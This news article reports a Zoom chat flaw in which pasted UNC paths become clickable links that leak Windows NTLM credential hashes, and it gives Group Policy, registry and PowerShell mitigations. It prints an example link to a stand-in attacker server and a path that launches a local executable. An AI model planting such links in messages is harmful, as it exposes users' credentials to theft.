Researchers: Zoom’s Videoconferencing Software Lets Attackers Send Network Links to Steal Windows Credentials



With COVID-19 locking workers at home, Zoom’s videoconferencing software is seeing a tremendous surge in usage and popularity, but it’s led to some serious scrutiny that isn’t working in the platform’s favor. Following allegations of data sharing, researchers now claim that Zoom has a security bug that lets attackers steal Windows logins and passwords.

This revolves around the fact that Zoom lets users paste UNC (Universal Naming Convention) paths into a chat window (e.g., \\evil.server.com\images\cat.jpg), which are then automatically translated into clickable links. According to Bleeping Computer – which reported on security researcher @_g0dmode’s initial findings – “Windows will attempt to connect to the remote site using the SMB file-sharing protocol to open the remote cat.jpg file. When doing this, by default Windows will send the user’s login name and their NTLM password hash, which can be cracked using free tools like Hashcat to dehash, or reveal, the user’s password.”

This can also be exploited to trick a user into launching programs on a local computer. “For example, clicking on a UNC path like \\127.0.0.1\C$\windows\system32\calc.exe will attempt to launch the Windows Calculator executable on the computer,” BleepingComputer explains. (Windows will show a prompt before taking any action, however.)

There’s an ongoing debate as to whether this is actually a Windows issue – some users are blaming the OS for lax security measures (e.g., readily sending credentials to remote servers). Others say that this is a whole lot of fuss over nothing, in that it’s no different from someone clicking on a suspicious email link.

In any case, there is an immediate fix for Zoom users who are paranoid about this so-called security bug.

For those who do not want to wait for a fix, there is a Group Policy that can be enabled that prevents your NTLM credentials from automatically being sent to a remote server when clicking on a UNC link.

This policy is called ‘Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers’ and is found under the following path in the Group Policy Editor.

Computer Configuration – Windows Settings – Security Settings – Local Policies – Security Options – Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

If this policy is configured to Deny All, Windows will no longer automatically send your NTLM credentials to a remote server when accessing a share.

It should be noted that when this policy is configured on domain-joined machines, it could cause issues when attempting to access shares. You can view this article to learn more about adding exceptions to the above policy.

If you are a Windows 10 Home user, you will not have access to the Group Policy Editor and will have to use the Windows Registry to configure this policy.

This can be done by creating the RestrictSendingNTLMTraffic Registry value under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 key and setting it to 2.
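As an added example (not code from the article or from Zoom), the PowerShell below reads and sets that same registry value, which backs the Group Policy described above. The key and value name are those given in the article; the function names are my own, and the script assumes an elevated prompt.

```powershell
# Added example: inspect and set RestrictSendingNTLMTraffic, the registry value
# behind "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".
# Run from an elevated PowerShell prompt. Function names are this example's own.
$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$ValueName = 'RestrictSendingNTLMTraffic'

# The three numeric values correspond to the three choices in the Group Policy Editor.
$Modes = @{ 0 = 'Allow all'; 1 = 'Audit all'; 2 = 'Deny all' }

function Get-OutgoingNtlmPolicy {
    # An absent value means the default, which is to allow outgoing NTLM.
    $item = Get-ItemProperty -Path $LsaKey -Name $ValueName -ErrorAction SilentlyContinue
    $raw  = if ($null -eq $item) { 0 } else { [int]$item.$ValueName }
    [pscustomobject]@{
        Value       = $raw
        Description = $Modes[$raw]
        Mitigated   = ($raw -eq 2)   # only "Deny all" stops the credential leak
    }
}

function Set-OutgoingNtlmPolicy {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [ValidateSet('Allow', 'Audit', 'Deny')]
        [string]$Mode = 'Deny'
    )
    $value = @{ Allow = 0; Audit = 1; Deny = 2 }[$Mode]
    if ($PSCmdlet.ShouldProcess("$LsaKey\$ValueName", "set to $value ($Mode all)")) {
        # The value is a REG_DWORD; -Force overwrites an existing value in place.
        New-ItemProperty -Path $LsaKey -Name $ValueName -PropertyType DWord `
                         -Value $value -Force | Out-Null
    }
    Get-OutgoingNtlmPolicy
}

# Example session: check the current state, then preview the change with -WhatIf.
Get-OutgoingNtlmPolicy
Set-OutgoingNtlmPolicy -Mode Deny -WhatIf
```

On domain-joined machines, setting Audit first and reviewing the Microsoft-Windows-NTLM/Operational event log shows which servers still rely on outgoing NTLM before moving to Deny.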

Tsing Mui
News poster at The FPS Review.
